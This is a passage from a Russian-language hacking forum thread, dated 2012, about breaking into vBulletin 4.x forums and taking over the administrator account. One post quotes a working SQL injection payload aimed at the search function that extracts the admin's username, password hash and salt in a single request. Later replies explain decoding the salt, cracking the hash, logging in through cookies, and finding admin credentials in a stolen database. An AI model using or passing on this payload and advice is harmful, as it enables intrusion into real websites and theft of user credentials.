HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Взлом vBulletin 4.x.x с последующией авторизацией в админский аккаунт
   
Ответ
Страница 2 из 4 < 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 09.04.2012, 21:18
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от Pirotexnik  
Pirotexnik said:
Модифицировал запрос.
Извлекаем логин, хэш и соль
ОДНИМ
запросом!
Первыая скуль с поиском:
Ловим запрос, посли нашего текста добавляем следующее:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
humanverify[/COLOR][COLOR="#007700"][]=&[/COLOR][COLOR="#0000BB"]searchfromtype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]vBForum[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3ASocialGroupMessage[/COLOR][COLOR="#007700"]&do=[/COLOR][COLOR="#0000BB"]process[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]contenttypeid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]categoryid[/COLOR][COLOR="#007700"][]=-[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]union select password from user where userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])>([/COLOR][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*),[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]( ([/COLOR][COLOR="#0000BB"]select concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]salt[/COLOR][COLOR="#007700"])) ,[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]x from[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]select 1 union select 2 union select 3[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]a group by x limit 1[/COLOR][COLOR="#007700"]) --[/COLOR][COLOR="#FF8000"]/*

[/COLOR][/COLOR] 
В слове "salt" форум вставляет пробелы.
В исходнике будет
LOGIN
:
HASH
:
SALT
!
p.s. добавте в шапку.
а символьное ограничение не смущает?
 
Ответить с цитированием

  #12  
Старый 09.04.2012, 23:52
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию
Влезает. хэш 32, соль меньше.
 
Ответить с цитированием

  #13  
Старый 09.04.2012, 23:59
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
ТС,забыл добавить что в соле могут быть знаки,которые нужно заменить

&quot; = "

&amp; = &

&gt; = >

&lt; =
 
Ответить с цитированием

  #14  
Старый 19.06.2012, 21:09
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
Подскажите как попасть в админку если есть доступ к базе данных?Булка 4.2.0
 
Ответить с цитированием

  #15  
Старый 19.06.2012, 22:32
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
to Sat-hacker

Вывести логин и пароль администратора форума и если вариант с авторизацией через cookie не пройдет, расшифровывать hash, не забыв при этом прихватить salt!

UPD. Читайте тему внимательно, в первом посте все подробно расписано!
 
Ответить с цитированием

  #16  
Старый 19.06.2012, 23:09
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
А как найти пароли в базе?База 1,5 GB
 
Ответить с цитированием

  #17  
Старый 20.06.2012, 21:35
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
Подскажите кто то!
 
Ответить с цитированием

  #18  
Старый 20.06.2012, 22:00
linvel
Guest
Сообщений: n/a
Провел на форуме:
64970

Репутация: 16
По умолчанию
Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
А как найти пароли в базе?База 1,5 GB
скачать любой брут, в разделе криптография и бруть
 
Ответить с цитированием

  #19  
Старый 20.06.2012, 23:12
Onths
Guest
Сообщений: n/a
Провел на форуме:
12204

Репутация: -4
По умолчанию
Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
А как найти пароли в базе?База 1,5 GB
Посмотреть id/ник администратора.

Обычно - 1.
 
Ответить с цитированием

  #20  
Старый 21.06.2012, 00:33
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
А в какой именно таблице?Или просто откріть всю базу 1,5 GB в текстовом документе и через поиск искать id 1?
 
Ответить с цитированием
Ответ
Страница 2 из 4 < 1 2 3 4 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ